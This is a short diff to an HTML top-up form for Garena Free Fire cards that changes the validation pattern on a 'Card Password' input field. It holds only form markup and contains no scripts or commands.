--- a/en-garena-card-freefire-topup.html
+++ b/en-garena-card-freefire-topup.html
@@ -84,7 +84,7 @@
   <button style="background-color:white;padding:10px 10px;color:#fff;border-radius:5px;text-decoration:none;" type="submit">
  </button>
   </td>
-   <input type="text" placeholder="Card Password" pattern="^[ABCD1234EFGH]{12}" required />
+   <input type="text" placeholder="Card Password" pattern="^[BXRFMRUB5V0ZP00M]{16}" required />
    <hr>
   <center>
   <button style="background-color:red;padding:6px 150px;color:#fff;border-radius:5px;text-decoration:none;" type="submit"><b>Confirm</b></button>
